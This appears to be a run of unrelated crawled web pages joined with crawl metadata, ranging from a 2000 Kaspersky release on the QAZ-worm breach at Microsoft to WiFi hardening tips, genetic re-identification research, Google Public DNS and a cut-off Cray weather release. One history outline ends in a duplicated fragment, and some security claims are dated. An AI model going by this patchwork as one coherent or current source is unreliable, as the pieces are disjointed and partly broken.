Cambridge, UK, October 28, 2000 - As disclosed on Friday, the corporate network of Microsoft, the world's largest software developer, was attacked by unknown hackers. The hackers used the QAZ network worm to penetrate into the network. As a result, the hackers gained access to the resources in which Microsoft stores the source code of its products, and may have copied some of them illegally.
Kaspersky Lab Int. presumes that at the moment there is little evidence to support the claim that Russian hackers from St.Petersburg performed the hacking. This scenario was introduced because the data from Microsoft's internal network was transferred to an e-mail address in Russia's northern capital. However, it is a well-known fact that the location of an e-mail box is not necessarily the same as the location of its owner. The e-mail address in St.Petersburg could be owned by anyone, from any country around the world. This email address could have been used in order to mislead the official investigation and the crime's actual origin, has yet to be discovered.
More important is the fact that the hacking was performed using the QAZ network worm. This worm was originally discovered earlier this year in July and Kaspersky Lab has received several reports of examples of this worm in-the-wild. Protection against the QAZ worm was immediately added to AntiViral Toolkit Pro (AVP) and other major anti-virus products' anti-virus databases. This raises the question: how did Microsoft's security systems miss the worm and make penetration possible? An enterprise's security policy should ensure that anti-virus protection is under the full control of highly qualified network administrators. It is therefore hard to believe that a workstation had no anti-virus software installed or that it had not been updated for a long time. It is more likely that a user had intentionally or accidentally disabled the anti-virus protection and allowed the worm to infect the computer.
More amazing still, even if the worm had penetrated into the Microsoft network it should not have been able to gain access to the worm's backdoor-component from the outside. Attempts to achieve this should have been squashed immediately by a firewall, that blocks data transfer from using certain communication ports, including the port used by the QAZ worm. In other words, hackers should not be able to control the malicious code from outside the network. Hence it appears that it is impossible to steal anything (including source code) from Microsoft's internal network using the QAZ worm, even if the hackers know passwords and login information.
Kaspersky Lab has no reason to question the competence of Microsoft's network administrators; it is easy to accidentally overlook a port that is commonly used by malicious programs.
Despite the recent incident, Kaspersky Lab does not agree with the sharp criticism aimed at Microsoft's security systems. It should not be forgotten that Microsoft has one of the largest internal networks in the world. The fact that this is its first serious incident of hacking over recent years only proves that Microsoft is actually doing very well. In fact, many other big corporations have been hacked successfully more often than Microsoft.
Besides, there is still no evidence that the hacking was done not from outside, but, rather, perhaps from within the company. In other words it may not be a problem of Microsoft's security systems, but Microsoft's security in general.
"Once again, we would like to draw users' attention to the fact that the installation of anti-virus software cannot be considered the only requirement for comprehensive anti-virus protection. The problem is complex and far reaching, it comes in direct contact with other security aspects and is an essential part of enterprise security in general," said Denis Zenkin, Head of Corporate Communications for Kaspersky Lab.
The technical description of the QAZ worm is available at Kaspersky's Virus Encyclopedia. | <urn:uuid:94200d26-8a54-4963-8032-187768a97e69> | CC-MAIN-2017-04 | http://www.kaspersky.com/au/about/news/virus/2000/Microsoft_Corporate_Network_is_Hacked_What_About_Your_Network_ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280891.90/warc/CC-MAIN-20170116095120-00285-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.961443 | 807 | 2.609375 | 3 |
Revision control manages changes to a set of data over time. These changes can be structured in various ways.
Often the data is thought of as a collection of many individual items, such as files or documents, and changes to individual files are tracked. This accords with intuitions about separate files, but causes problems when identity changes, such as during renaming, splitting, or merging of files. Accordingly, some systems, such as git, instead consider changes to the data as a whole, which is less intuitive for simple changes, but simplifies more complex changes.
When data that is under revision control is modified, after being retrieved by checking out, this is not in general immediately reflected in the revision control system (in therepository), but must instead be checked in or committed. A copy outside revision control is known as a "working copy". As a simple example, when editing a computer file, the data stored in memory by the editing program is the working copy, which is committed by saving. Concretely, one may print out a document, edit it by hand, and only later manually input the changes into a computer and save it. For source code control, the working copy is instead a copy of all files in a particular revision, generally stored locally on the developer's computer;[note 1] in this case saving the file only changes the working copy, and checking in to the repository is a separate step.
If multiple people are working on a single data set or document, they are implicitly creating branches of the data (in their working copies), and thus issues of merging arise, as discussed below. For simple collaborative document editing, this can be prevented by using file locking or simply avoiding working on the same document that someone else is working on.
Revision control systems are often centralized, with a single authoritative data store, the repository, and check-outs and check-ins done with reference to this central repository. Alternatively, in distributed revision control, no single repository is authoritative, and data can be checked out and checked in to any repository. When checking in to a different repository, this is interpreted as a merge or patch. | <urn:uuid:318f0828-a093-4079-b96d-b457ea4c81dd> | CC-MAIN-2017-04 | http://sozluk.cozumpark.com/goster.aspx?id=2402&kelime=working-copy | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280761.39/warc/CC-MAIN-20170116095120-00221-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.935423 | 436 | 3.578125 | 4 |
What email address or phone number would you like to use to sign in to Docs.com?
If you already have an account that you use with Office or other Microsoft services, enter it here.
Or sign in with:
Signing in allows you to download and like content, which the author will be aware of.
Embed code for: Chapter 6 outline
Select a size
Johnny R. Phillips 10-17-2016 Chapter 6 outline
The Revolution within:
Abigail Adams born in Massachusetts in 1744
The dream of equality:
1.The Revolution unleashed public debates and political and social struggles that enlarged the scope of freedom and challenged inherited structures of power within America.
2.The Declaration of Independence’s assertion that “all men are created equal” announced a radical principle whose full implication could not be anticipated
Expanding the political nation:
1.the democratization of freedom was dramatic for free men.
2.Arisans, small farmers, laborers, and militia all emerged as self-conscious elements in politics
The revolution in Pennsylvania:
1.The prewar elite of Pennsylvania was dramatic for free men.
2.Pennsylvania’s 1776 constitution sought to institutionalize democracy in a number of ways, including
1.Establishing an annually elected, one-house legislature
2.Allowing tax-paying men to vote
3.Abolishing the office of governor
1.Each state wrote a new constitution and all agreed that their government must be republics.
2.One-house legislatures were adopted only by Pennsylvania, Georgia, and Vermont.
3.John Adam’s “balanced governments” included house legislatures.
The right to vote:
1.The property qualification for suffrage was hotly debated.
2.The least democratization occurred in the southern states, where highly deferential political tradition enabled the landed gentry to retain their control of political affairs.
3.By the 1780s, with the exception of Virginia, Maryland, and New York, a large majority of the adult white male population could meet voting requirements.
Toward religious toleration
Joining forces with France and inviting Quebec to join in the struggle against Britain had weakened anti-Catholicism.
Separating church and state:
1.The drive to separate church and state brought together Deists with members of evangelical sects.
2.Many states still limited religious freedom
3.Catholics gained the right to worship without persecution throughout the state
Jefferson and Religious Liberty:
1.Thomas Jefferson’s bill for establishing religious freedom separated church and state.
2.Thanks to religious freedom, the early republic witnessed an amazing proliferation of religious denominations.
3.DEFING ECONOMIC FREEDOM
Toward free labor:
By the 1800’s indentured servitude had all but disappeared from the United States
The soul of a republic:
To most free Americans, equality meant equal opportunity rather than equality of condition.
The politics of inflation:
Some Americans responded to wartime inflation by accusing merchants of hoarding goods by seizing stocks of food to be sold at the traditional “just price”
The debate over free trade:
1.Congress urged states to adopt measures to fix wages and prices.
2.Adam Smith’s argument that the “invisible hand” of the market directed economic life more effectively and fairly than government.
4.THE LIMITS OF LIBERTY
The limits of Liberty:
An estimated 20 to 25 percent of Americans were Loyalists.
The Loyalists’ Plight:
1.The war for Independence was in some respect a civil war among Americans.
2.When the war ended, as many as 100,000 Loyalists were banished from the United States or emigrated voluntarily.
The Indian Revolution:
1.American independence meant the loss of freedom for Indians.
Slavery and the revolution:
The irony that Americans cried for Liberty while enslaving Africans.
Obstacles to Abolition:
Some patriots argued that slavery for blacks made freedom possible for whites
The cause of general Liberty:
1.By defining freedom as a universal entitlement rather than as a set of rights specific to a particular place or people, the Revolution inevitably raised questions about the status of slavery in the new nation.
2.Samual Sewall’s The Selling of Joseph (1700) was the first antislavery tract in America
3.In 1773, Benjamin Rush warned that slavery was a “national crime” that would bring “national Punishment”
Petitions for Freedom;
1.Slaves in the north and in the South appropriated the language of liberty for their own purposes.
2.Slaves presented “freedom petitions” in New England in the early 1770s.
1.Nearly 100,000 slaves deserted their owners and fled to British lines.
2.At the end of the war, over 15,000 blacks accompanied the British out of the country.
Abolition in the North:
Between 1777 and 1804, every state north of Maryland took steps toward emancipation.
Free black communities:
After the war, free black communities with their own churches, schools, and leaders came into existence.f-conscious elements in politics
3.In 1773, Benjamin Rush warned that slavery was a “national crime” that w | <urn:uuid:f8577ab7-11c3-42c6-a2d5-f4df39d55c5c> | CC-MAIN-2017-04 | https://docs.com/johnny-phillips/2644/chapter-6-outline | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281424.85/warc/CC-MAIN-20170116095121-00460-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.92456 | 1,131 | 3.421875 | 3 |
The researchers say free form gestures could be more secure than passwords or “connect-the-dots” grid features.
Researchers from Rutgers School of Engineering in the US are exploring whether or not free form gestures could be used as a secure password.
A study by the researchers found that the free-form gestures, sweeping fingers in shapes across the screen of a smart phone or tablet, can replace password to unlock phones, access apps.
The researchers say free form gestures could be more secure than passwords or "connect-the-dots" grid features as the later can be easily memorised by ‘shoulder surfers’ who spy on users.
According to the researchers, the free form gestures could be complex compared to grid-based gestures as users create them without following a template.
Rutgers School of Engineering’s Department of Electrical and Computer Engineering assistant professor and one of the leaders of the project, Janne Lindqvist, said: "All it takes to steal a password is a quick eye."
"With all the personal and transactional information we have on our phones today, improved mobile security is becoming increasingly critical," Lindqvist added.
In order to assess the practicality of the method, researchers from Rutgers and collaborators from Max-Planck Institute for Informatics, including Antti Oulasvirta, and University of Helsinki studied the free-form gestures for access authentication.
During the study, the researchers applied a generate-test-retest paradigm where 63 participants were asked to draw a gesture, recall it, and recall it again 10 days later.
A recogniser system designed by the researchers captured the gestures and based on the data they tested the memorability of the gestures and found that the gestures can be used as passwords.
"You can create any shape, using any number of fingers, and in any size or location on the screen," Lindqvist said.
"We saw that this security protection option was clearly missing in the scientific literature and also in practice, so we decided to test its potential."
The researchers are now further testing their preliminary findings whether it can be used at wider scale though it appears as a better way to prevent password breaches.
The finding will be published in June MobiSys ’14, an international conference in mobile computing. | <urn:uuid:513970cd-d4ae-4943-93c6-71e5208e359b> | CC-MAIN-2017-04 | http://www.cbronline.com/news/mobility/devices/squiggly-lines-could-be-your-secure-passwords-4287570 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282935.68/warc/CC-MAIN-20170116095122-00368-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.929925 | 475 | 2.859375 | 3 |
We’ve looked at police bees vs DNA hackers before, and how freaky future weaponized viruses and zero-day exploits may aim to infect your brain. Well there are lots of cool and creepy things happening in the area of DNA again. From biological 'hard drives,' to exploiting a vulnerability to expose identities of supposedly anonymous genetic donors—and people in their family tree that never donated DNA, to Homeland Security discussing potentially launching a “social conditioning campaign” so people won’t freak out about plans to develop and deploy rapid DNA analyzers.
A single gram of DNA could store enough data to fill 468,000 DVDs
Picture something as tiny as a “speck of dust” that can store a text file containing the entire collection of Shakespeare's 154 sonnets, a 26 second MP3 from Martin Luther King Jr.'s "I have a dream" speech, a PDF of the first research paper describing the double helical nature of DNA by James Watson and Francis Crick, as well as JPG photo from the European Bioinformatics Institute (EMBL-EBI). Since DNA strands about the size of a dust speck stored all that, Emily Leproust of Agilent Technologies said that a cupful of DNA could hold “a hundred million hours of high-definition video.” Researchers in the United Kingdom told Nature that they improved upon the DNA encoding scheme and raised storage density to 2.2 petabytes per gram, which is three times better than the last effort.
A team led by molecular biologists Nick Goldman and Ewan Birney of the European Bioinformatics Institute, with help from Agilent Technologies, also added an error correction scheme so the data could be read back with 100% accuracy. To put the storage density another way, a single gram of DNA could store what we can currently fit on 468,000 DVDs, about 2.2 million gigabits of data. If stored in a cool and dry place, DNA can be stable for thousands of years. According to the EBI researchers, DNA data storage is now only cost-effective for data that needs to be archived for 600 years or more. “But if the costs of DNA synthesis—currently the most expensive part of the enterprise—drop 100-fold, that break-even number would drop to about 50 years.” However such DNA as biological hard drive storage could prove invaluable for institutions like the Large Hadron Collider since it creates about 15 petabytes of data per year.
From DNA slick tricks to scarier DNA news: Hacking privacy of 'anonymous' donors
You may be used to hearing about vulnerabilities leading to security and privacy breaches, but in a new twist, scientists exploited vulnerabilities in the security of genetic data posted online from supposedly anonymous donors. “Using only a computer, an Internet connection, and publicly accessible online resources, a team of Whitehead Institute researchers has been able to identify nearly 50 individuals who had submitted personal genetic material as participants in genomic studies.” Not only that, but they were able to find their entire families, even though the relatives had not donated DNA. The scientists published the results of their research in Science magazine.
Whitehead Fellow Yaniv Erlich used to work as a white hat hacker, pen testing for vulnerabilities in banks, but this time, using public databases, he searched out an easily found type of DNA pattern on the Y chromosome that is passed from father to son; it “looks like stutters among billions of chemical letters in human DNA.” Since “there is a strong link in men between their surname and unique markings on the male, or Y, chromosome,” Elrich took the Y chromosome's short “stutters” and then searched a genealogy database for men with those same repeating DNA patterns. That gave him the surnames of the paternal and maternal grandfather. A quick Google search for those people turned up an obituary, which then gave him the family tree.
Melissa Gymrek, a member of the Erlich’s team, explained, “We show that if, for example, your Uncle Dave submitted his DNA to a genetic genealogy database, you could be identified. In fact, even your fourth cousin Patrick, whom you’ve never met, could identify you if his DNA is in the database, as long as he is paternally related to you.”
Elrich said, “This is an important result that points out the potential for breaches of privacy in genomic studies. Our aim is to better illuminate the current status of identifiability of genetic data. More knowledge empowers participants to weigh the risk and benefits and make more informed decisions when considering whether to share their own data.” He added, “We also hope that this study will eventually result in better security algorithms, better policy guidelines, and better legislation to help mitigate some of the risks.”
During a Science Magazine podcast, Gymrek pointed out one of the scarier risks of what could be done with this data. “So the big example that comes to mind is something like insurance companies. If insurance companies can know who you are, know your DNA sequence, they can determine if you’re predisposed to certain disorders, and they can use that information against you to raise your premiums and to make your life bad. You can think of scenarios like that where these are people that you don’t want getting a hold of your genetic data that might be able to get a hold of it.”
Eric D. Green, director of the National Human Genome Research Institute at the National Institutes of Health, said, "We are in what I call an awareness moment." Dr. Amy L. McGuire, an attorney and ethicist at Baylor College of Medicine said, "To have the illusion you can fully protect privacy or make data anonymous is no longer a sustainable position." Mildred Cho of the Stanford University's Center for Integration of Research on Genetics and Ethics added, "Nobody can promise privacy." Basically, if your DNA is public, then so are you and your family.
DHS plans for Rapid DNA Analyzers
Why else could this be potentially dangerous for you? Because, as the EFF explained in an unrelated bit of scary DNA news, Rapid DNA analyzers that can “process DNA in 90 minutes or less” are “coming soon to a police department or immigration office near you.” Rapid DNA Analyzers are “about the size of a laser printer” and “are designed to be used in the field by non-scientists.” Manufacturers are telling the U.S. government the devices “will soon revolutionize the use of DNA by making it a routine identification and investigational tool.” Documents from the US Citizenship and Immigration Services (USCIS) and DHS’s Science & Technology show that funds have been earmarked “to develop a Rapid DNA analyzer that can verify familial relationships for refugee and asylum applications for as little as $100.”
The EFF added:
DHS and USCIS acknowledge that “DNA collection may create controversy.” One USCIS employee advocated for “DHS, with the help of expert public relation professionals,” to “launch a social conditioning campaign” to “dispel the myths and promote the benefits of DNA technology.” Another document feared that “If DHS fails to provide an adequate response to [inquiries about its Rapid DNA Test Program] quickly, civil rights/civil liberties organizations may attempt to shut down the test program." | <urn:uuid:2ce55cc6-4b7b-4f3f-aa98-cd07a9f1d88b> | CC-MAIN-2017-04 | http://www.computerworld.com/article/2474257/emerging-technology/researchers-exploit-flaw-to-identify-anonymous-dna-donors-and-their-families.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00276-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947945 | 1,566 | 2.5625 | 3 |
When the astronauts who pieced together the International Space Station snapped photos of the view from the cosmos, little did they know that there would eventually be an app for that.
On the 15th anniversary of the ISS, a recently-departed NASA program manager noted that a winner of the agency’s recent "hackathon," which she managed, designed an iPad tool for timing the best extraterrestrial shots.
Terrestrial photogs can use the same app to frame the astronauts.
The concept was "we’re going to alert you and we’re going to alert the astronauts on station 10- minutes before the flyover, so you can wave, and they can wave, and it coordinates a photo between the two," Ali Llewellyn, former NASA Open Innovation Program Office community manager, said during an interview on the sidelines of a conference hosted by Nextgov.
The T-10 app (pronounced T minus 10) lets astronauts choose the area they want to photograph, pick whether they want a day or night shot, and set an alarm to go off when the location is visible. They receive a ten minute warning before the cross by. When the alarm sounds, they say "yes" to proceed with the countdown, and a message alerts T-10 iOS and Android device users on Earth to smile for the camera.
The Earthlings also get a 10-minute warning so they can grab telescopes and cameras to find a good angle. The astronaut's countdown screen displays the number of people ready to pose.
During an 83-hour brainstorming session this spring, citizens and astronauts in 44 countries "online and beyond" collaborated to solve specific NASA problems using public data sources, like space station positions.
Still, the ISS is probably more inventive than the app.
The space station "stands as one of the engineering marvels of this or any other age, and a testament to American ingenuity and perseverance," House Science Committee Ranking Member Rep. Eddie Bernice Johnson, D-Texas, said in a statement. “NASA should be proud of having built a robust facility for testing life support systems and other technologies to ensure they work in space and are reliable.” | <urn:uuid:543eb1d4-ffd8-482e-a13c-363262ff1854> | CC-MAIN-2017-04 | http://www.nextgov.com/mobile/2013/11/say-cheese-and-happy-birthday-international-space-station/74231/?oref=ng-flyin | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00304-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.934425 | 447 | 2.578125 | 3 |
Google Public DNS, Google's own free Domain Name System, is an attempt to make Web pages load faster at a time when millions of users are accessing the Web several times a day, triggering multiple DNS requests and bogging down the Web page rendering process. Google says Google Public DNS focuses on improving DNS speed, security and the validity of results. Read on to find out how it works and what information Google stores.
In its latest effort to accelerate the rate at which Web pages load for
users, Google Dec. 3 launched its own free Domain Name System, Google Public DNS,
into a crowded market that includes several providers already
is basically a hierarchical naming system for computers or any
resource connected to the Internet. However, because it is not something the
average Web user sees on the surface, it helps to think of the DNS as a sort of
phone book for the Internet because it translates computer host names into IP
addresses. Prem Ramaswami, product manager for Google Public DNS, explained:
"Most of us aren't familiar with
DNS because it's often handled automatically by our Internet Service Provider
(ISP), but it provides an essential function for the Web. You could think of it
as the switchboard of the Internet, converting easy-to-remember domain names-e.g.,
www.google.com-into the unique Internet Protocol (IP) numbers-e.g.,
18.104.22.168-that computers use to communicate with one another."
Google Public DNS is the company's stab at making Web pages load faster at a
time when millions of users are accessing the Web several times a day,
triggering multiple DNS requests. This can bog down the Web page rendering
process, which means users are sitting at their computers, waiting to view Web
Ramaswami told eWEEK that Google Public DNS is focused on improving DNS
speed, security and the validity of results. He explained how it works: When a
user loads a Web page, that triggers a DNS query to the ISP, which in turn has
to go out across the Web to get the correct answer. For example, when a user
searches for mail.google.com, his or her ISP resolver will go ask the dot-com
servers what Google.com's server is, then go ask Google.com's server what the
IP address is for mail.google.com and return that to the Web user.
This process takes longer, Ramaswami noted, because the DNS has to crawl the
Web and ask several servers to get the correct answer. Google Public DNS issues
DNS queries constantly, regardless of whether people have queried the DNS. This
means Google always has the query info in its cache. Each question comes with a
"time to live." Before the time limit of, say 300 seconds, expires,
Google will ask the question for a big range of domain names. | <urn:uuid:84e21694-c224-4233-899f-02899b4369cc> | CC-MAIN-2017-04 | http://www.eweek.com/c/a/Search-Engines/Google-Rolls-Out-Free-Domain-Name-System-Service-740634 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285337.76/warc/CC-MAIN-20170116095125-00120-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.897268 | 613 | 2.875 | 3 |
Geospatial intelligence is ingrained in our daily lives. We use map apps on our smart phones, companies use location-based beacon technology to target consumers, we use geo-tags with social media and we depend on a vast network of precision logistics to keep our lights on, our vehicles driving, our packages delivered and our cupboards stocked. The mechanism that supports all of these endeavors is rooted in the realization and virtualization of big data. If we needed an umbrella under which we would hang these concepts, we’d call it the Internet of Things – an amorphous framework that encompasses both legacy and leading edge technologies, big data, the literal Internet, and users spanning from industrial machines to the average consumer with a smart phone.
Despite the obvious need for geospatial data within this IoT framework, industries have found in calculating the value of that data to be a complex practice. Industries that once stood alone and operated in silos, have become interconnected by sheer necessity – collecting, analyzing, sharing and even selling data. It no longer is acceptable for companies supporting critical infrastructures to track basic data. They must gather data from all facets of operations and information technologies, analyze that data, and turn it into actionable intelligence. The value of data today truly exceeds its numerical quantity.
Geospatial Data and the Internet of Things
Geospatial data is the key to unlocking some of the critical functions that developers and end-users require to effectively empower the Internet of Things. Navigation functions on a cell phone? Geospatial data. Restaurant or entertainment recommendations in a specific area? Geospatial data. City bus route coordination? Geospatial data. Most often, we see the end result of geospatial data virtualization, but what we don’t see is just how many people touch that data to even get it to the point of deployable information.
This Data Value Chain has changed the way people and groups of people interact in our daily lives, as a whole, both internally and externally. The industries affected by geospatial data use it in innovative ways – from the collection on the ground – to analytics in the back office. It drives decision-making, project management, business intelligence, and increases productivity by streamlining workflows. These industries are directly responsible for building and maintaining the critical infrastructure upon which cities – and countries – are built and maintained. With each iteration of geospatial data along the chain, the value of that data increases.
Blended Technologies Drive a Data Value Chain
The Data Value Chain is a framework in which people can view the flow of geospatial data from the instant it is collected throughout its entire lifecycle. Each vertical industry has its own flow (and needs) of data, but eventually, that data intersects with analytics engines that can turn individual points of information into all different kinds of actionable intelligence. The Data Value Chain depends on a blended technology ecosystem that acts as disruptive force throughout the global marketplace to root out traditional, static practices and supplant them with innovative, purpose-built solutions based on data analytics.
Technology is simply a means to an end. The focus should not be on the newest tools. Rather, it is more important to know what users need in order to accomplish peak business intelligence. To do this, we first must understand how people work. Who are they, and what is their role in a project or enterprise? What information do they need? Where and how do they use it? And what is the end result?
The answers to these questions often illustrate how people use multiple types of data that come from different sources at different times. End users often need to combine and analyze the data to derive its value. Only when we understand these processes can we ask the next question: How can we use technology to gather and analyze data that will make their work easier?
The solution often lies in a technological ecosystem—a synergistic combination of core technologies to gather and manage data combined with software and tools for processing, analysis and delivery. Technological ecosystems built around geospatial information derived from big data support the needs of, and actions for, large portions of an organization.
The use of integrated or blended technologies is one of the most important trends in the geospatial and IoT arena. By combining multiple technologies, integrated solutions provide new ways to work and reduce costs, accelerate schedules and supply high-value deliverables along the value chain. And even though many geospatial practitioners are deeply interested in integrated technology, their clients may not share that passion. As long as information is complete, accurate and usable, the people using it may have little interest in how it got to them. That’s a key point to keep in mind.
It seems that every day we see new combinations of technologies that are producing ever-larger volumes of data. That trend will continue. But these systems can only deliver data. The value of the data is not realized until it is converted to information and put to work, which brings us to the need for a holistic, purpose-built data value chain across an enterprise.
The implicit value of geospatial data belongs to the 21st century workforce awash in data virtualization and the impending boom of IoT technology: from the boots on the ground mapping geographic terrain and gathering data in urban and rural settings, to engineers and project managers turning that data into knowledge and developing creative solutions for difficult infrastructural dilemmas; and even to the back-office decision makers tasked with solving the problems of today with an eye on the obstacles of tomorrow. The intersection of blended technologies, the growth of critical geospatial data collection, and the accompanying virtualization of that data have pushed IoT innovation to new heights. As we allow these industries and applications to flourish, the possibilities for a connected future are increasingly tangible.
Ron Bisio joined Trimble in 1996 and has held several marketing, sales, and general management positions prior to taking over worldwide responsibility in 2015 as Vice President of Trimble Geospatial. He holds a Master of Business Administration from the University of Denver; a Master of Regional Planning from the University of Massachusetts; and an undergraduate degree in Geographic Information Systems & Cartography from Salem State University in Salem, Massachusetts.
Subscribe to Data Informed for the latest information and news on big data and analytics for the enterprise, plus get instant access to more than 20 eBooks. | <urn:uuid:1dfc5b5c-5d0c-4237-a629-492915bf73a2> | CC-MAIN-2017-04 | http://data-informed.com/when-big-data-iot-and-geospatial-technology-collide/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00332-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927872 | 1,297 | 2.65625 | 3 |
Wireless networks (aka WiFi) are in pretty much every home out there. What most people aren’t aware of is how easy it is to inadvertently open them up to unauthorized access. By incorrectly configuring your wireless router you risk exposing your personal information, and having your internet service leveraged for illegal activities.
There are steps that can be taken to ensure that your home WiFi network is secure, such as:
- Change the default admin username and password: All routers have a default password, and almost all of these passwords can be obtained by a simple internet search. Change the router’s username and password before making any other changes.
- Disable WPS or WiFi Protected Setup: WPS is a less-secure way to connect to a WiFi network, and can be easier to crack. This can be disabled by logging into your router.
- Change the WiFi SSID: The SSID is the name of your WiFi network. Change it to something unique that is not associated to you or your family.
- Choose a strong encryption method: Do not leave your WiFi network unsecured or “open”. Select a strong encryption such as “WPA” or “WPA2”. DO NOT USE “WEP” encryption.
- Choose a strong WiFi password/passphrase: Choose a passphrase that is unique, and difficult to guess. An example of a strong passphrase is: FG$$#gat1299MDB; more than 8 characters, alphanumeric with non-standard characters included, not a dictionary word.
- Change your WiFi passphrase regularly: Anyone you’ve given the password to will have access to your WiFi network, and you cannot always guarantee the secrecy of your passphrase in the hands of others. Changing your passphrase regularly will help protect you should your passphrase be obtained by an untrustworthy source.
- Disable access when not in use: If you plan on leaving your home for a long period of time, for example while on vacation, power off your router. This will ensure that no one will be able to gain unauthorized access while you are away.
- Enable MAC filtering: Every computer or device that connects to a WiFi network has its own unique identifier; a MAC address similar to the license plate on your vehicle. By enabling MAC filtering you can restrict access to the MAC addresses you pre-installed into your router. Every other address is rejected.
Many of these settings can be easily configured with the help of your router’s quick-start guide or user manual. If you have questions or would like assistance with your WiFi network, please contact our helpdesk for a consultation. | <urn:uuid:02105f13-bc96-4e06-a676-4abd0324d834> | CC-MAIN-2017-04 | http://wiki.sirkit.ca/2012/12/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00056-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.905841 | 553 | 2.953125 | 3 |
Windows allows you to customize how the time is displayed in Windows so that it includes leading zeros or changes it from 12 hour to 24 hour format. In order to do this, you need to change these settings within the Region control panel. The Region and Language control panel allows you to customize how the time is displayed on your computer, how currency is shown, and how numbers are formatted. Using this control panel we can control how the time is displayed and customize it exactly as we wish.
In Windows Vista and Windows 7, you can click on the Start button and type Region. When the Region and Language search result appears, please click on it. On Windows 8, type Region from the Start Screen and then click on the Settings category. Then click on the Region search result. You should now see the Region control panel.
Click on the Additional settings button and you should now be at the Customize Format screen.
Now click on the Time tab to get to the section where you can customize how the time is displayed in Windows.
In this screen you can change how Windows displays the time by specifying different format strings, or notations, in the Short Time and Long Time fields. This notation is then substituted by the particular data that it represents. For example, the h notation means 12 hour time, while the H notation means 24 hour time. Therefore, if you had a time notation of h:m:s tt, the time would read 4:18:12 PM. On the other hand if you had a notation of H:m:s tt the time would read 16:18:12 PM. Notice that since we used the H notation, the time was shown in 24 hour format.
It is also important to note that the time tab will have two time strings called Short time and Long time. The Short time field represents a short notation that will typically just show hours and minutes and a time period (AM/PM). Long time, on the other hand, will represent a longer notation that also displays the seconds. For the most part, when Windows displays the time it will be using the notation from the Long time. Therefore, if you wish to change how Windows displays the time, you would want to modify the Long time notation.
Below is a table explaining the various notation and how it affects the display of the time.
|h||The current hour in 12 hour format.||h:m:s||4:9:3|
|hh||The current hour 12 hour format with leading zeros.||hh:m:s tt||04:9:3 PM|
|H||The current hour 12 hour format.||H:m:s tt||16:9:3 PM|
|HH||The current hour 12 hour format with leading zeros.||HH:m:s tt||05:9:3 AM|
|m||The current minute.||h:m:s||4:9:3|
|mm||The current minute with leading zeros.||h:mm:s||4:09:3|
|s||The current second.||h:mm:s||4:09:3|
|ss||The current second with leading zeros.||h:mm:ss||4:09:03|
|tt||AM or PM symbol.||h:mm:ss tt||4:09:03 PM|
To change how Windows displays the time, simply use the above table as a reference to change the notation in the Long time field. Once you change the notation, you can have it go into effect by pressing the Apply button on the Customize Format screen and then pressing OK. Then press Apply and OK on the Region control panel screen. Windows should now be displaying the modified time string. If you wish to revert back to the default US English time format, you can se it to h:mm:ss tt.
In Windows there are certain programs that are configured as the default one to use for certain tasks. Windows will then use these default programs when a person performs a particular action in Windows. For example, even if you have multiple web browsers installed in Windows, only one will be configured as the default. This default web browser will then be used whenever you perform a particular ...
Windows 8 includes a new menu called the Power User Tasks menu that allows quick access to various power user functions in Windows 8. This menu can be accessed from any screen and includes options such as the classic control panel, event viewer, and the elevated command prompt. This makes it easier for a user to quickly perform advanced tasks in Windows 8.
When Windows is installed on your computer it can be installed as a 32-bit version or a 64-bit version. For most people, whether they use a 32-bit or a 64-bit version of Windows does not make a difference. It is, though, important to know whether you are running a 64-bit or 32-bit version of Windows when performing certain tasks on your computer. For example, if you install new hardware or update ...
If you are a system administrator, IT professional, or a power user it is common to find yourself using the command prompt to perform administrative tasks in Windows. Whether it be copying files, accessing the Registry, searching for files, or modifying disk partitions, command-line tools can be faster and more powerful than their graphical alternatives. This tutorial will walk you through ...
If you try to play a DVD in Windows 8 you may have noticed that you are unable to do so. This is because Microsoft removed free DVD playback from Windows 8 due to the costs of licensing the codecs necessary to properly play DVDs. Instead, if you wish to play a DVD you must first upgrade to Windows 8 Pro using the Windows 8 Pro Pack, or if you are already using Windows 8 Pro, install the Windows ... | <urn:uuid:debd229f-9596-4202-bbb7-1d94b7d6fb58> | CC-MAIN-2017-04 | https://www.bleepingcomputer.com/tutorials/customize-how-time-is-displayed-in-windows/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279368.44/warc/CC-MAIN-20170116095119-00452-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.857042 | 1,209 | 3.359375 | 3 |
Latest Computer Models Zoom Down to Level of Individual Storm Cells
SEATTLE, WA, Aug 29, 2007 (MARKET WIRE via COMTEX News Network) -- Global supercomputer leader Cray Inc. (NASDAQ: CRAY) today announced
that scientists have leveraged the power of a Cray supercomputer at
the Pittsburgh Supercomputing Center (PSC) to break new ground in
weather prediction. Researchers from the University of Oklahoma's
Center for Analysis and Prediction of Storms (CAPS) and the National
Oceanic & Atmospheric Administration (NOAA) employed an innovative
combination of high resolution and controlled manipulation of
numerical model parameters and starting conditions to develop
strategies that will allow forecasters to better anticipate the
formation of severe storms and the supercells that give birth to
destructive tornados. The research was part of the NOAA Hazardous
Weather Testbed (HWT) Spring Experiment.
"Each day during the Spring Experiment that was conducted from
mid-April through early June, CAPS scientists applied emerging
scientific methods to design a 10-member 'ensemble' of forecasts from
the Weather Research and Forecasting, or WRF, software model,"
